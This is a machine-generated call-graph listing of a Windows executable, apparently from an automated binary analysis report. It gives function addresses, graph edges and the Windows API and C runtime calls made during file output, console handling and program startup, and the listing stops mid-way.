std::bad_alloc::bad_alloc _CxxThrowException 38759->38765 38760->38724 38761->38759 38768 7ff69a4172dd 38766->38768 38767 7ff69a3e7325 38767->38550 38767->38552 38768->38767 38769 7ff69a43a480 4 API calls 38768->38769 38769->38767 38771 7ff69a3f907e 38770->38771 38772 7ff69a3f9057 CryptGenRandom CryptReleaseContext 38770->38772 38774 7ff69a3f9c9c 11 API calls 38771->38774 38772->38771 38773 7ff69a3f9089 38772->38773 38775 7ff69a3f9c9c 38773->38775 38774->38773 38776 7ff69a42c0a8 10 API calls 38775->38776 38777 7ff69a3f9cc5 38776->38777 38790 7ff69a442d74 38777->38790 38781 7ff69a3f9c49 38780->38781 38782 7ff69a429d15 __BuildCatchObjectHelper 38780->38782 38784 7ff69a429b70 38781->38784 38782->38781 38793 7ff69a429d74 38782->38793 38788 7ff69a429bd9 __scrt_fastfail 38784->38788 38789 7ff69a429bad __scrt_fastfail 38784->38789 38785 7ff69a429d74 8 API calls 38786 7ff69a429c07 38785->38786 38786->38745 38787 7ff69a429d74 8 API calls 38787->38788 38788->38785 38789->38787 38789->38788 38791 7ff69a3f9cd7 38790->38791 38792 7ff69a442d8b QueryPerformanceCounter 38790->38792 38791->38741 38792->38791 38794 7ff69a429dbc 38793->38794 38794->38794 38795 7ff69a43a610 _UnwindNestedFrames 8 API calls 38794->38795 38796 7ff69a429f40 38795->38796 38796->38782 38804 7ff69a428094 38797->38804 38800 7ff69a408a44 38801 7ff69a408a5a __scrt_fastfail 38800->38801 38836 7ff69a42bac4 38801->38836 38805 7ff69a42809f 38804->38805 38808 7ff69a427ec8 38805->38808 38809 7ff69a427efa __BuildCatchObjectHelper 38808->38809 38815 7ff69a427fb5 38809->38815 38822 7ff69a42b3f0 38809->38822 38811 7ff69a42805c GetCurrentProcessId 38813 7ff69a40896e 38811->38813 38813->38800 38814 7ff69a427f7e GetProcAddressForCaller GetProcAddress 38814->38815 38815->38811 38816 7ff69a427ff1 38815->38816 38816->38813 38831 7ff69a3fca6c 48 API calls 2 library calls 38816->38831 38818 7ff69a42801f 38832 7ff69a3fcda4 10 API calls 2 library calls 38818->38832 38820 7ff69a428027 38833 7ff69a3fca40 61 API calls _CxxThrowException 38820->38833 38834 7ff69a43a5a0 38822->38834 38825 7ff69a42b428 38828 7ff69a43a610 _UnwindNestedFrames 8 API calls 38825->38828 38826 7ff69a42b42c 38827 7ff69a4148bc 8 API calls 38826->38827 38829 7ff69a42b444 LoadLibraryExW 38827->38829 38830 7ff69a427f72 38828->38830 38829->38825 38830->38814 38830->38815 38831->38818 38832->38820 38833->38813 38835 7ff69a42b3fc GetSystemDirectoryW 38834->38835 38835->38825 38835->38826 38839 7ff69a42ba70 GetCurrentProcess GetProcessAffinityMask 38836->38839 38840 7ff69a4089c5 38839->38840 38840->38552 38843 7ff69a419245 38841->38843 38849 7ff69a406194 72 API calls 38843->38849 38844 7ff69a4192b1 38850 7ff69a406194 72 API calls 38844->38850 38846 7ff69a4192bd 38851 7ff69a406194 72 API calls 38846->38851 38848 7ff69a4192c9 38849->38844 38850->38846 38851->38848 38852->38564 38853->38567 38854->38571 38855->38572 38856->38561 38857->38565 38858->38563 38859->38578 38860 7ff69a3e82f0 38861 7ff69a3e8306 38860->38861 38874 7ff69a3e836f 38860->38874 38862 7ff69a3e8324 38861->38862 38865 7ff69a3e8371 38861->38865 38861->38874 38980 7ff69a402414 61 API calls 38862->38980 38864 7ff69a3e8347 38981 7ff69a401998 138 API calls 38864->38981 38865->38874 38982 7ff69a401998 138 API calls 38865->38982 38868 7ff69a3e835e 38869 7ff69a4018ac 15 API calls 38868->38869 38869->38874 38873 7ff69a3e8578 38875 7ff69a3eb540 147 API calls 38873->38875 38883 7ff69a3ea410 38874->38883 38880 7ff69a3e858f 38875->38880 38876 7ff69a3eb540 147 API calls 38876->38873 38877 7ff69a3e8634 38878 7ff69a43a610 _UnwindNestedFrames 8 API calls 38877->38878 38879 7ff69a3e8663 38878->38879 38880->38877 38983 7ff69a3e9628 175 API calls 38880->38983 38984 7ff69a417a68 38883->38984 38886 7ff69a3e853a 38888 7ff69a3eb540 38886->38888 38892 7ff69a3eb55f setbuf 38888->38892 38889 7ff69a3eb5a1 38890 7ff69a3eb5d8 38889->38890 38891 7ff69a3eb5b8 38889->38891 39132 7ff69a418c1c 38890->39132 39018 7ff69a3eaba0 38891->39018 38892->38889 39014 7ff69a3ea4d0 38892->39014 38895 7ff69a43a610 _UnwindNestedFrames 8 API calls 38896 7ff69a3e854f 38895->38896 38896->38873 38896->38876 38897 7ff69a3eb67f 38898 7ff69a3ebc91 38897->38898 38900 7ff69a3eb6a5 38897->38900 38901 7ff69a3ebbae 38897->38901 38899 7ff69a3eb5d3 38898->38899 38903 7ff69a402574 126 API calls 38898->38903 38899->38895 38900->38899 38912 7ff69a3eb6b5 38900->38912 38930 7ff69a3eb79f 38900->38930 38904 7ff69a418d00 48 API calls 38901->38904 38903->38899 38906 7ff69a3ebc5c 38904->38906 39201 7ff69a418d38 48 API calls 38906->39201 38910 7ff69a3ebc69 39202 7ff69a418d38 48 API calls 38910->39202 38912->38899 39166 7ff69a418d00 38912->39166 38913 7ff69a3ebc76 39203 7ff69a418d38 48 API calls 38913->39203 38915 7ff69a3ebc84 39204 7ff69a418d88 48 API calls 38915->39204 38920 7ff69a3eb726 39170 7ff69a418d38 48 API calls 38920->39170 38922 7ff69a3eb733 38923 7ff69a3eb749 38922->38923 39171 7ff69a418d88 48 API calls 38922->39171 38925 7ff69a3eb75c 38923->38925 39172 7ff69a418d38 48 API calls 38923->39172 38926 7ff69a3eb779 38925->38926 38929 7ff69a418d00 48 API calls 38925->38929 39173 7ff69a418f94 38926->39173 38929->38925 38931 7ff69a3eb8e5 38930->38931 39183 7ff69a3ec3c8 CharLowerW CharUpperW 38930->39183 39184 7ff69a42d840 WideCharToMultiByte 38931->39184 38935 7ff69a3eb9a1 38938 7ff69a418d00 48 API calls 38935->38938 38936 7ff69a3eb910 38936->38935 39186 7ff69a3e945c 55 API calls _UnwindNestedFrames 38936->39186 38939 7ff69a3eb9c4 38938->38939 39187 7ff69a418d38 48 API calls 38939->39187 38941 7ff69a3eb9d1 39188 7ff69a418d38 48 API calls 38941->39188 38943 7ff69a3eb9de 39189 7ff69a418d88 48 API calls 38943->39189 38945 7ff69a3eb9eb 39190 7ff69a418d88 48 API calls 38945->39190 38947 7ff69a3eba0b 38948 7ff69a418d00 48 API calls 38947->38948 38949 7ff69a3eba27 38948->38949 39191 7ff69a418d88 48 API calls 38949->39191 38951 7ff69a3eba37 38952 7ff69a3eba49 38951->38952 39192 7ff69a42bc48 15 API calls 38951->39192 39193 7ff69a418d88 48 API calls 38952->39193 38955 7ff69a3eba59 38956 7ff69a418d00 48 API calls 38955->38956 38957 7ff69a3eba66 38956->38957 38958 7ff69a418d00 48 API calls 38957->38958 38959 7ff69a3eba78 38958->38959 39194 7ff69a418d38 48 API calls 38959->39194 38961 7ff69a3eba85 39195 7ff69a418d88 48 API calls 38961->39195 38963 7ff69a3eba92 38964 7ff69a3ebacd 38963->38964 39196 7ff69a418d88 48 API calls 38963->39196 39198 7ff69a418e3c 38964->39198 38967 7ff69a3ebab2 39197 7ff69a418d88 48 API calls 38967->39197 38969 7ff69a3ebb33 38972 7ff69a3ebb53 38969->38972 38976 7ff69a418e3c 48 API calls 38969->38976 38971 7ff69a418d00 48 API calls 38974 7ff69a3ebb09 38971->38974 38973 7ff69a3ebb6e 38972->38973 38977 7ff69a418e3c 48 API calls 38972->38977 38978 7ff69a418f94 126 API calls 38973->38978 38974->38969 38975 7ff69a418e3c 48 API calls 38974->38975 38975->38969 38976->38972 38977->38973 38978->38899 38980->38864 38981->38868 38982->38874 38983->38877 38985 7ff69a3ea434 38984->38985 38987 7ff69a417a8d 38984->38987 38985->38886 38992 7ff69a4022e0 38985->38992 38986 7ff69a417aaf 38986->38985 38989 7ff69a4022e0 12 API calls 38986->38989 38987->38986 38997 7ff69a417340 157 API calls 38987->38997 38990 7ff69a417adf 38989->38990 38998 7ff69a402440 38990->38998 39008 7ff69a4020b4 38992->39008 38995 7ff69a402307 38995->38886 38997->38986 38999 7ff69a402454 38998->38999 39000 7ff69a40246a SetFilePointer 38998->39000 39001 7ff69a4024ad 38999->39001 39006 7ff69a3fcd00 10 API calls 38999->39006 39000->39001 39002 7ff69a40248d GetLastError 39000->39002 39001->38985 39002->39001 39004 7ff69a402497 39002->39004 39004->39001 39007 7ff69a3fcd00 10 API calls 39004->39007 39011 7ff69a402130 39008->39011 39012 7ff69a4020d0 39008->39012 39009 7ff69a402102 SetFilePointer 39010 7ff69a402126 GetLastError 39009->39010 39009->39011 39010->39011 39011->38995 39013 7ff69a3fcd00 10 API calls 39011->39013 39012->39009 39015 7ff69a3ea4ea 39014->39015 39016 7ff69a3ea4ee 39015->39016 39017 7ff69a402440 12 API calls 39015->39017 39016->38889 39017->39016 39019 7ff69a3eabbf setbuf 39018->39019 39020 7ff69a418c1c 48 API calls 39019->39020 39023 7ff69a3eabf5 39020->39023 39021 7ff69a3eb4af 39024 7ff69a3eb4ff 39021->39024 39028 7ff69a402574 126 API calls 39021->39028 39022 7ff69a3eacbf 39025 7ff69a3eb35c 39022->39025 39026 7ff69a3eacc8 39022->39026 39023->39021 39027 7ff69a3f9be0 14 API calls 39023->39027 39044 7ff69a3eaca7 39023->39044 39029 7ff69a4172c0 4 API calls 39024->39029 39030 7ff69a418eec 48 API calls 39025->39030 39033 7ff69a3eacdd 39026->39033 39065 7ff69a3eaea7 39026->39065 39131 7ff69a3ead60 39026->39131 39031 7ff69a3eac34 39027->39031 39028->39024 39029->39131 39032 7ff69a3eb395 39030->39032 39036 7ff69a3f90b8 75 API calls 39031->39036 39037 7ff69a3eb3ad 39032->39037 39223 7ff69a3e9e2c 48 API calls 39032->39223 39034 7ff69a3ead68 39033->39034 39035 7ff69a3eace6 39033->39035 39039 7ff69a418eec 48 API calls 39034->39039 39035->39131 39205 7ff69a418eec 39035->39205 39038 7ff69a3eac8f 39036->39038 39042 7ff69a418eec 48 API calls 39037->39042 39038->39044 39050 7ff69a402574 126 API calls 39038->39050 39045 7ff69a3ead9c 39039->39045 39041 7ff69a43a610 _UnwindNestedFrames 8 API calls 39046 7ff69a3eb52b 39041->39046 39047 7ff69a3eb3d4 39042->39047 39044->39021 39044->39022 39051 7ff69a418eec 48 API calls 39045->39051 39046->38899 39048 7ff69a3eb3e6 39047->39048 39052 7ff69a418eec 48 API calls 39047->39052 39055 7ff69a418eec 48 API calls 39048->39055 39050->39044 39054 7ff69a3eada9 39051->39054 39052->39048 39053 7ff69a418eec 48 API calls 39056 7ff69a3ead31 39053->39056 39057 7ff69a418eec 48 API calls 39054->39057 39059 7ff69a3eb451 39055->39059 39060 7ff69a418eec 48 API calls 39056->39060 39058 7ff69a3eadb5 39057->39058 39061 7ff69a418eec 48 API calls 39058->39061 39062 7ff69a3eb471 39059->39062 39069 7ff69a418eec 48 API calls 39059->39069 39063 7ff69a3ead46 39060->39063 39064 7ff69a3eadc2 39061->39064 39067 7ff69a3eb486 39062->39067 39070 7ff69a418e3c 48 API calls 39062->39070 39066 7ff69a418f94 126 API calls 39063->39066 39068 7ff69a418d00 48 API calls 39064->39068 39073 7ff69a3eafda 39065->39073 39213 7ff69a3e9b64 48 API calls _UnwindNestedFrames 39065->39213 39066->39131 39071 7ff69a418f94 126 API calls 39067->39071 39072 7ff69a3eadcf 39068->39072 39069->39062 39070->39067 39071->39131 39074 7ff69a3f90b8 75 API calls 39072->39074 39080 7ff69a3eaff2 39073->39080 39214 7ff69a3e9d98 48 API calls 39073->39214 39077 7ff69a3eae22 39074->39077 39078 7ff69a418e3c 48 API calls 39077->39078 39079 7ff69a3eae33 39078->39079 39081 7ff69a418e3c 48 API calls 39079->39081 39083 7ff69a3eb02b 39080->39083 39215 7ff69a3e9efc 48 API calls _UnwindNestedFrames 39080->39215 39084 7ff69a3eae48 39081->39084 39082 7ff69a3eb0af 39087 7ff69a3eb0c8 39082->39087 39217 7ff69a3ea1a0 48 API calls 2 library calls 39082->39217 39083->39082 39216 7ff69a3ea2c8 48 API calls 39083->39216 39091 7ff69a429ce4 8 API calls 39084->39091 39089 7ff69a3eb0e2 39087->39089 39218 7ff69a3ea350 48 API calls _UnwindNestedFrames 39087->39218 39092 7ff69a418eec 48 API calls 39089->39092 39093 7ff69a3eae60 39091->39093 39094 7ff69a3eb0fc 39092->39094 39095 7ff69a429b70 8 API calls 39093->39095 39097 7ff69a418eec 48 API calls 39094->39097 39096 7ff69a3eae6d 39095->39096 39098 7ff69a418e3c 48 API calls 39096->39098 39099 7ff69a3eb109 39097->39099 39100 7ff69a3eae80 39098->39100 39101 7ff69a3eb11f 39099->39101 39103 7ff69a418eec 48 API calls 39099->39103 39102 7ff69a418f94 126 API calls 39100->39102 39209 7ff69a418e94 39101->39209 39102->39131 39103->39101 39106 7ff69a418eec 48 API calls 39107 7ff69a3eb147 39106->39107 39108 7ff69a418e94 48 API calls 39107->39108 39109 7ff69a3eb15f 39108->39109 39110 7ff69a418eec 48 API calls 39109->39110 39113 7ff69a3eb16c 39110->39113 39111 7ff69a3eb18a 39112 7ff69a3eb1a9 39111->39112 39220 7ff69a418d88 48 API calls 39111->39220 39115 7ff69a418e94 48 API calls 39112->39115 39113->39111 39219 7ff69a418d88 48 API calls 39113->39219 39117 7ff69a3eb1bc 39115->39117 39118 7ff69a418eec 48 API calls 39117->39118 39119 7ff69a3eb1d6 39118->39119 39121 7ff69a3eb1e9 39119->39121 39221 7ff69a3ec3c8 CharLowerW CharUpperW 39119->39221 39121->39121 39122 7ff69a418eec 48 API calls 39121->39122 39123 7ff69a3eb21f 39122->39123 39124 7ff69a418e3c 48 API calls 39123->39124 39125 7ff69a3eb230 39124->39125 39126 7ff69a3eb247 39125->39126 39127 7ff69a418e3c 48 API calls 39125->39127 39128 7ff69a418f94 126 API calls 39126->39128 39127->39126 39129 7ff69a3eb278 39128->39129 39129->39131 39222 7ff69a4170d8 4 API calls 2 library calls 39129->39222 39131->39041 39224 7ff69a418f28 39132->39224 39135 7ff69a3f90b8 39136 7ff69a3f9123 39135->39136 39150 7ff69a3f91a9 39135->39150 39136->39150 39242 7ff69a427e74 39136->39242 39137 7ff69a43a610 _UnwindNestedFrames 8 API calls 39139 7ff69a3eb66e 39137->39139 39151 7ff69a402574 39139->39151 39141 7ff69a42d840 WideCharToMultiByte 39142 7ff69a3f9157 39141->39142 39143 7ff69a3f91c4 39142->39143 39144 7ff69a3f916a 39142->39144 39142->39150 39261 7ff69a3f9338 12 API calls _UnwindNestedFrames 39143->39261 39145 7ff69a3f916f 39144->39145 39146 7ff69a3f91ab 39144->39146 39145->39150 39246 7ff69a3f98b0 39145->39246 39260 7ff69a3f951c 71 API calls _UnwindNestedFrames 39146->39260 39150->39137 39152 7ff69a4025a5 39151->39152 39153 7ff69a40259e 39151->39153 39154 7ff69a4025ab GetStdHandle 39152->39154 39159 7ff69a4025ba 39152->39159 39153->38897 39154->39159 39155 7ff69a402619 WriteFile 39155->39159 39156 7ff69a4025cf WriteFile 39157 7ff69a40260b 39156->39157 39156->39159 39157->39156 39157->39159 39158 7ff69a402658 GetLastError 39158->39159 39159->39153 39159->39155 39159->39156 39159->39158 39163 7ff69a402721 39159->39163 39326 7ff69a403144 9 API calls 2 library calls 39159->39326 39327 7ff69a3fcf34 10 API calls 39159->39327 39328 7ff69a3fc95c 126 API calls 39159->39328 39161 7ff69a402684 SetLastError 39161->39159 39329 7ff69a3fcf14 10 API calls 39163->39329 39167 7ff69a3e161c 48 API calls 39166->39167 39168 7ff69a3eb719 39167->39168 39169 7ff69a418d38 48 API calls 39168->39169 39169->38920 39170->38922 39171->38923 39172->38925 39174 7ff69a419131 39173->39174 39175 7ff69a418fcf 39173->39175 39174->38899 39182 7ff69a41905d 39175->39182 39330 7ff69a3fca6c 48 API calls 2 library calls 39175->39330 39176 7ff69a4190e0 39176->39174 39177 7ff69a402574 126 API calls 39176->39177 39177->39174 39178 7ff69a3e161c 48 API calls 39178->39176 39180 7ff69a41904c 39331 7ff69a3fca40 61 API calls _CxxThrowException 39180->39331 39182->39176 39182->39178 39183->38931 39185 7ff69a3eb8f8 CharToOemA 39184->39185 39185->38936 39186->38935 39187->38941 39188->38943 39189->38945 39190->38947 39191->38951 39192->38952 39193->38955 39194->38961 39195->38963 39196->38967 39197->38964 39199 7ff69a3e161c 48 API calls 39198->39199 39200 7ff69a3ebaf2 39199->39200 39200->38969 39200->38971 39200->38974 39201->38910 39202->38913 39203->38915 39204->38898 39206 7ff69a418efc 39205->39206 39207 7ff69a418d00 48 API calls 39206->39207 39208 7ff69a3ead24 39206->39208 39207->39206 39208->39053 39210 7ff69a418eac 39209->39210 39211 7ff69a418d00 48 API calls 39210->39211 39212 7ff69a3eb137 39210->39212 39211->39210 39212->39106 39213->39073 39214->39080 39215->39083 39216->39082 39217->39087 39218->39089 39219->39111 39220->39112 39221->39121 39222->39131 39223->39037 39227 7ff69a3e161c 39224->39227 39226 7ff69a3eb601 39226->38897 39226->38898 39226->39135 39228 7ff69a3e1640 39227->39228 39237 7ff69a3e16aa __BuildCatchObjectHelper 39227->39237 39229 7ff69a3e166d 39228->39229 39238 7ff69a3fca6c 48 API calls 2 library calls 39228->39238 39232 7ff69a3e168e 39229->39232 39234 7ff69a3e16d4 39229->39234 39231 7ff69a3e1661 39239 7ff69a3fcb64 8 API calls 39231->39239 39232->39237 39240 7ff69a3fcb64 8 API calls 39232->39240 39234->39237 39241 7ff69a3fcb64 8 API calls 39234->39241 39237->39226 39238->39231 39243 7ff69a427e95 39242->39243 39245 7ff69a3f9143 39242->39245 39244 7ff69a427ec8 68 API calls 39243->39244 39244->39245 39245->39141 39247 7ff69a3f9b45 39246->39247 39251 7ff69a3f9920 39246->39251 39248 7ff69a43a610 _UnwindNestedFrames 8 API calls 39247->39248 39249 7ff69a3f9b61 39248->39249 39249->39150 39252 7ff69a3f996d 39251->39252 39253 7ff69a3f9b75 39251->39253 39262 7ff69a427da8 39251->39262 39252->39252 39269 7ff69a3fa0f4 39252->39269 39254 7ff69a427f24 68 API calls 39253->39254 39257 7ff69a3f9acb 39254->39257 39256 7ff69a3f99d0 39256->39256 39285 7ff69a427f24 39256->39285 39257->39247 39257->39257 39299 7ff69a424ea8 8 API calls _UnwindNestedFrames 39257->39299 39260->39150 39261->39150 39263 7ff69a427e74 68 API calls 39262->39263 39264 7ff69a427ddc 39263->39264 39265 7ff69a427e74 68 API calls 39264->39265 39266 7ff69a427def 39265->39266 39267 7ff69a43a610 _UnwindNestedFrames 8 API calls 39266->39267 39268 7ff69a427e43 39267->39268 39268->39251 39273 7ff69a3fa15c __BuildCatchObjectHelper 39269->39273 39270 7ff69a3fa358 39322 7ff69a43a774 8 API calls __report_securityfailure 39270->39322 39272 7ff69a3fa352 39321 7ff69a43a774 8 API calls __report_securityfailure 39272->39321 39273->39270 39273->39272 39276 7ff69a3fa192 39273->39276 39277 7ff69a3fa34d 39273->39277 39275 7ff69a3fa35e 39300 7ff69a3f9dd8 39276->39300 39320 7ff69a43a774 8 API calls __report_securityfailure 39277->39320 39280 7ff69a3fa1d9 39281 7ff69a3f9dd8 8 API calls 39280->39281 39282 7ff69a3fa2f1 39280->39282 39281->39280 39283 7ff69a43a610 _UnwindNestedFrames 8 API calls 39282->39283 39284 7ff69a3fa33b 39283->39284 39284->39256 39286 7ff69a427f5e 39285->39286 39292 7ff69a427fb5 39285->39292 39287 7ff69a42b3f0 10 API calls 39286->39287 39286->39292 39289 7ff69a427f72 39287->39289 39288 7ff69a42805c GetCurrentProcessId 39290 7ff69a428034 39288->39290 39291 7ff69a427f7e GetProcAddressForCaller GetProcAddress 39289->39291 39289->39292 39290->39257 39291->39292 39292->39288 39293 7ff69a427ff1 39292->39293 39293->39290 39323 7ff69a3fca6c 48 API calls 2 library calls 39293->39323 39295 7ff69a42801f 39324 7ff69a3fcda4 10 API calls 2 library calls 39295->39324 39297 7ff69a428027 39325 7ff69a3fca40 61 API calls _CxxThrowException 39297->39325 39299->39247 39301 7ff69a3f9e46 39300->39301 39303 7ff69a3f9e6e __scrt_fastfail 39300->39303 39302 7ff69a429ce4 8 API calls 39301->39302 39304 7ff69a3f9e5e 39302->39304 39306 7ff69a3f9e85 39303->39306 39308 7ff69a429ce4 8 API calls 39303->39308 39305 7ff69a429b70 8 API calls 39304->39305 39305->39303 39307 7ff69a429ce4 8 API calls 39306->39307 39309 7ff69a3f9f97 39307->39309 39308->39306 39310 7ff69a429b70 8 API calls 39309->39310 39312 7ff69a3f9fa8 __scrt_fastfail 39310->39312 39311 7ff69a429ce4 8 API calls 39314 7ff69a3fa0bb 39311->39314 39313 7ff69a3f9fb4 39312->39313 39315 7ff69a429ce4 8 API calls 39312->39315 39313->39311 39316 7ff69a429b70 8 API calls 39314->39316 39315->39313 39317 7ff69a3fa0c9 39316->39317 39318 7ff69a43a610 _UnwindNestedFrames 8 API calls 39317->39318 39319 7ff69a3fa0d8 39318->39319 39319->39280 39320->39272 39321->39270 39322->39275 39323->39295 39324->39297 39325->39290 39326->39161 39328->39159 39330->39180 39331->39182 39332 7ff69a43b0fc 39351 7ff69a43aa8c 39332->39351 39336 7ff69a43b148 39341 7ff69a43b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39336->39341 39359 7ff69a44472c 39336->39359 39337 7ff69a43b123 __scrt_acquire_startup_lock 39337->39336 39407 7ff69a43b52c 7 API calls __scrt_fastfail 39337->39407 39340 7ff69a43b16d 39341->39340 39342 7ff69a43b1f7 39341->39342 39408 7ff69a442574 35 API calls IsInExceptionSpec 39341->39408 39363 7ff69a443fc4 39342->39363 39349 7ff69a43b220 39409 7ff69a43ac64 8 API calls 2 library calls 39349->39409 39352 7ff69a43aaae __isa_available_init 39351->39352 39410 7ff69a43e2f8 39352->39410 39357 7ff69a43aab7 39357->39337 39406 7ff69a43b52c 7 API calls __scrt_fastfail 39357->39406 39361 7ff69a444744 39359->39361 39360 7ff69a444766 39360->39341 39361->39360 39459 7ff69a43b010 39361->39459 39364 7ff69a43b20c 39363->39364 39365 7ff69a443fd4 39363->39365 39367 7ff69a417e20 39364->39367 39551 7ff69a443c84 39365->39551 39591 7ff69a42b470 GetModuleHandleW 39367->39591 39373 7ff69a417e58 SetErrorMode GetModuleHandleW 39374 7ff69a4248cc 21 API calls 39373->39374 39375 7ff69a417e7d 39374->39375 39376 7ff69a423e48 137 API calls 39375->39376 39377 7ff69a417e90 39376->39377 39378 7ff69a3f3d3c 126 API calls 39377->39378 39379 7ff69a417e9c 39378->39379 39380 7ff69a43a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39379->39380 39381 7ff69a417ead 39380->39381 39382 7ff69a417ebf 39381->39382 39383 7ff69a3f3f18 70 API calls 39381->39383 39384 7ff69a3f4d1c 157 API calls 39382->39384 39383->39382 39385 7ff69a417ed6 39384->39385 39386 7ff69a417eef 39385->39386 39388 7ff69a3f6ad0 154 API calls 39385->39388 39387 7ff69a3f4d1c 157 API calls 39386->39387 39390 7ff69a417eff 39387->39390 39389 7ff69a417ee7 39388->39389 39391 7ff69a3f4e48 160 API calls 39389->39391 39392 7ff69a417f0d 39390->39392 39394 7ff69a417f14 39390->39394 39391->39386 39393 7ff69a42b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39392->39393 39393->39394 39395 7ff69a3f4888 58 API calls 39394->39395 39396 7ff69a417f57 39395->39396 39397 7ff69a3f4fd0 268 API calls 39396->39397 39398 7ff69a417f5f 39397->39398 39399 7ff69a417f9e 39398->39399 39400 7ff69a417f8c 39398->39400 39404 7ff69a43b684 GetModuleHandleW 39399->39404 39401 7ff69a42b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39400->39401 39402 7ff69a417f93 39401->39402 39402->39399 39403 7ff69a42b57c 14 API calls 39402->39403 39403->39399 39405 7ff69a43b698 39404->39405 39405->39349 39406->39337 39407->39336 39408->39342 39409->39340 39411 7ff69a43e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39410->39411 39423 7ff69a43eb08 39411->39423 39414 7ff69a43aab3 39414->39357 39418 7ff69a4445e4 39414->39418 39416 7ff69a43e318 39416->39414 39430 7ff69a43eb50 DeleteCriticalSection 39416->39430 39420 7ff69a449d4c 39418->39420 39419 7ff69a43aac0 39419->39357 39422 7ff69a43e32c 8 API calls 3 library calls 39419->39422 39420->39419 39447 7ff69a4466c0 39420->39447 39422->39357 39424 7ff69a43eb10 39423->39424 39426 7ff69a43eb41 39424->39426 39428 7ff69a43e30b 39424->39428 39431 7ff69a43e678 39424->39431 39436 7ff69a43eb50 DeleteCriticalSection 39426->39436 39428->39414 39429 7ff69a43e8a4 8 API calls 3 library calls 39428->39429 39429->39416 39430->39414 39437 7ff69a43e34c 39431->39437 39434 7ff69a43e6cf InitializeCriticalSectionAndSpinCount 39435 7ff69a43e6bb 39434->39435 39435->39424 39436->39428 39438 7ff69a43e3b2 39437->39438 39441 7ff69a43e3ad 39437->39441 39438->39434 39438->39435 39439 7ff69a43e47a 39439->39438 39443 7ff69a43e489 GetProcAddress 39439->39443 39440 7ff69a43e3e5 LoadLibraryExW 39440->39441 39442 7ff69a43e40b GetLastError 39440->39442 39441->39438 39441->39439 39441->39440 39446 7ff69a43e458 FreeLibrary 39441->39446 39442->39441 39444 7ff69a43e416 LoadLibraryExW 39442->39444 39443->39438 39445 7ff69a43e4a1 39443->39445 39444->39441 39445->39438 39446->39441 39458 7ff69a446938 EnterCriticalSection 39447->39458 39449 7ff69a4466d0 39450 7ff69a448050 32 API calls 39449->39450 39451 7ff69a4466d9 39450->39451 39452 7ff69a4466e7 39451->39452 39454 7ff69a4464d0 34 API calls 39451->39454 39453 7ff69a446998 fflush LeaveCriticalSection 39452->39453 39455 7ff69a4466f3 39453->39455 39456 7ff69a4466e2 39454->39456 39455->39420 39457 7ff69a4465bc GetStdHandle GetFileType 39456->39457 39457->39452 39460 7ff69a43b020 pre_c_initialization 39459->39460 39480 7ff69a442b00 39460->39480 39462 7ff69a43b02c pre_c_initialization 39486 7ff69a43aad8 39462->39486 39464 7ff69a43b045 39465 7ff69a43b049 _RTC_Initialize 39464->39465 39466 7ff69a43b0b5 39464->39466 39491 7ff69a43ace0 39465->39491 39523 7ff69a43b52c 7 API calls __scrt_fastfail 39466->39523 39468 7ff69a43b0bf 39524 7ff69a43b52c 7 API calls __scrt_fastfail 39468->39524 39470 7ff69a43b05a pre_c_initialization 39494 7ff69a443b0c 39470->39494 39472 7ff69a43b0ca __scrt_initialize_default_local_stdio_options 39472->39361 39475 7ff69a43b06a 39522 7ff69a43b7dc RtlInitializeSListHead 39475->39522 39477 7ff69a43b06f pre_c_initialization 39478 7ff69a444818 pre_c_initialization 35 API calls 39477->39478 39479 7ff69a43b09a pre_c_initialization 39478->39479 39479->39361 39481 7ff69a442b11 39480->39481 39482 7ff69a442b19 39481->39482 39525 7ff69a444f3c 15 API calls abort 39481->39525 39482->39462 39484 7ff69a442b28 39526 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39484->39526 39487 7ff69a43ab96 39486->39487 39490 7ff69a43aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39486->39490 39527 7ff69a43b52c 7 API calls __scrt_fastfail 39487->39527 39489 7ff69a43aba0 39490->39464 39528 7ff69a43ac90 39491->39528 39493 7ff69a43ace9 39493->39470 39495 7ff69a443b2a 39494->39495 39496 7ff69a443b40 39494->39496 39533 7ff69a444f3c 15 API calls abort 39495->39533 39535 7ff69a449370 39496->39535 39500 7ff69a443b2f 39534 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39500->39534 39502 7ff69a443b72 39539 7ff69a4438ec 35 API calls pre_c_initialization 39502->39539 39503 7ff69a43b066 39503->39468 39503->39475 39505 7ff69a443b9c 39540 7ff69a443aa8 15 API calls 2 library calls 39505->39540 39507 7ff69a443bb2 39508 7ff69a443bcb 39507->39508 39509 7ff69a443bba 39507->39509 39542 7ff69a4438ec 35 API calls pre_c_initialization 39508->39542 39541 7ff69a444f3c 15 API calls abort 39509->39541 39512 7ff69a443bbf 39513 7ff69a444a74 __vcrt_freefls 15 API calls 39512->39513 39513->39503 39514 7ff69a443be7 39514->39512 39515 7ff69a443c17 39514->39515 39517 7ff69a443c30 39514->39517 39543 7ff69a444a74 39515->39543 39519 7ff69a444a74 __vcrt_freefls 15 API calls 39517->39519 39518 7ff69a443c20 39520 7ff69a444a74 __vcrt_freefls 15 API calls 39518->39520 39519->39512 39521 7ff69a443c2c 39520->39521 39521->39503 39523->39468 39524->39472 39525->39484 39526->39482 39527->39489 39529 7ff69a43acbf 39528->39529 39531 7ff69a43acb5 _onexit 39528->39531 39532 7ff69a444434 34 API calls _onexit 39529->39532 39531->39493 39532->39531 39533->39500 39534->39503 39536 7ff69a44937d 39535->39536 39537 7ff69a443b45 GetModuleFileNameA 39535->39537 39549 7ff69a4491b0 48 API calls 5 library calls 39536->39549 39537->39502 39539->39505 39540->39507 39541->39512 39542->39514 39544 7ff69a444a79 RtlFreeHeap 39543->39544 39545 7ff69a444aa9 __vcrt_freefls 39543->39545 39544->39545 39546 7ff69a444a94 39544->39546 39545->39518 39550 7ff69a444f3c 15 API calls abort 39546->39550 39548 7ff69a444a99 GetLastError 39548->39545 39549->39537 39550->39548 39552 7ff69a443c98 39551->39552 39556 7ff69a443ca1 39551->39556 39552->39556 39557 7ff69a443ccc 39552->39557 39556->39364 39558 7ff69a443caa 39557->39558 39559 7ff69a443ce5 39557->39559 39558->39556 39569 7ff69a443e78 17 API calls 2 library calls 39558->39569 39560 